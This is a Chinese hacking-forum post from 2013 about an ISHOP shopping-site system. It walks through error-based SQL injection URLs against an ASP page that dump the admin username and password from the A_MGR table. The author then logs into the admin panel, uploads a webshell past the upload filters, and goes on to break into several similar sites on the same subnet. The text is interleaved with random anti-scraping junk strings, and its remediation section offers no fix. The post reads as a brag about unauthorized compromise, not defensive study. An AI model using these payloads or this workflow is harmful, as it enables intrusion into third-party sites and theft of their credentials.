中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点
( u% W. @$ n- X( \- D0 ghttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
3 R- d; M& ^& b
2 T( S/ W$ b" I% }习惯性的加’having1=1--: X0 k1 Q& s( C! U

2 O) P8 e& v4 i* mhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—: b+ e+ z1 q4 I, [8 y' v

6 E  w& d0 v  a. w: ?. L0
4 R0 b& S' C0 ]  B; A
3 t: a" W' j2 I! t爆出Diary_A.dl_Title(这时候很激动啊)( G) N& t+ x* {& w1 Y$ ]% P+ B
- C7 H0 d9 N  y. q. `" t; q1 P( P+ t
那么继续
6 A' d) `3 V# D7 vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—, Y# Z/ Q/ O2 [( t& r# \5 w5 b

+ `8 i2 {9 d: \5 i" V5 [* @继续,一直爆下去
# T0 J: |- s% r1 z. B) H, S7 A. y  f$ S% @
爆到几个字段和表段 但是没找到需要的管理用户的字段
: C# b! z/ `5 b' k! H* \! G) @7 H, b& X
蛋疼了 怎么办 然后去后台登陆页看源码3 s- i1 s" g* c3 U8 ]6 z

* w) _' N4 E; |. R6 @00 O# I* J; B% D8 t8 {! Y  F' }) G
  L$ H' t- W0 Z3 u1 F3 r/ o
Input name= “ADUID”- }9 i: m& F0 u8 Z! }0 f2 B  Z5 P
Input name= “ADPWD”9 R6 d8 V0 w5 C1 V8 O& B- s! F9 e& a
, M9 ]1 H2 U/ p' v# N- d# M. [' ^) {
很幸运 找到了字段那就继续
8 y( j: S0 Q& P4 I找到之后开始爆用户
9 `( h$ c% @, D/ d$ V$ Vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—: K% p! K! Q3 i4 H6 }- {$ J- T; ]* P
爆密码- I7 v; l! U2 y1 k# _# x0 T
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—/ j. f, F& X/ O& Q: |! }- S
测试了下 这个注入点只能爆到文章哪里的表 % |- U/ k/ Y7 a3 U/ ^4 h
9 \; K" g! {9 A6 o
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了1 R6 F4 ]% l  F

1 X0 c5 N& Q8 ^$ o  D. J又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
9 v- y$ j  n( E% O
1 U) ]5 }# p) q, ~7 Q( d' P473
1 E  H9 V$ D3 {' _' Z: p  I- I4 B/ c' Y
进后台
" O& i! s/ o' ~! ]8 g: U5 G( o& L! }8 |( m" g1 t+ O/ z

( X" E8 ~" C% ?* _! B9 F4 c) y4 y发现几个上传点 有的地方不能上传 而且防止恶意代码# [% a2 \" A* V, `5 f

3 I8 v" K- D: o- r: V7 v: N' z! R没办法 各种百度各种找大牛 找到一只好像可以突破的马
1 y3 F0 k1 @6 v' R! T; V* Z0 D/ Y* p4 d& n  |3 Q! x

6 X4 W. T* w8 C, [9 J0 J+ ]在系统管理那里直接上传 不过没有显示地址: N# I* G; h7 y
1 O* {/ W# G, V3 ~1 o# V
再上传一次 抓包 搞定OK
) O9 U2 P, t# o; G5 r+ Z- T% [2 e3 M  W9 Z

# D0 Q. B+ s+ B# Y7 a" Y1 ]1 A
+ t5 g% {- m5 J472& A8 ~# d2 G' Y2 K- X7 T- E: `

1 B( ?: A6 R2 @. E& J晚上不行了 去睡觉。。。
1 [4 X# v% z( c* A' S第二天刚起床 闲的没事做继续日站吧 9 U6 U$ g+ x; O+ m' I2 S

& i; M  o, s% E) A5 ~找个站 就把这个站的旁c扫了下
# v; a# B. s/ K* j  `. [# |* _% [! }! c* n5 z7 @! b+ j4 c' F
发现c段也有一个购物站 ,然后还和这个站的模板差不多* c: |+ j6 n7 }4 c( F6 ?- y

3 x) x3 A& Y* E. \就找到会员登录口测试
  A2 I1 h* e  z. e
" w( p* A7 U& ^; n) b'and (select top 1 MGR_UID from A_MGR)>0—
9 y* z+ I. O" V% h2 e; y6 f8 q果断爆到了 这时候我很激动 通杀
- p2 r- m, F- {6 A% ~6 d5 W4 G; u2 g" y' V" t. Q' }6 l
再次翻c段
  k- f2 y$ B( k. `! C: V- p. x
1 n, D8 W; j3 t6 h  Y' E翻出几个站 都成功拿下1 h+ @  ^/ b; y7 a% R+ H9 c
5 O7 C3 s4 [- e7 C
" K& `! A& ^, G) H
; @. V( d$ I; c- |) ^8 n% K% G
修复方案:- w7 V7 t* w" e* @+ X1 Z
他们比我专业
, o+ w  ]* w: k  v& \( x5 Y7 O* t: W( R- X- l
# b2 F3 Y/ Y/ G; Z. \

: y  m* x3 |! _6 L- H% O, Q) T: i6 x



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2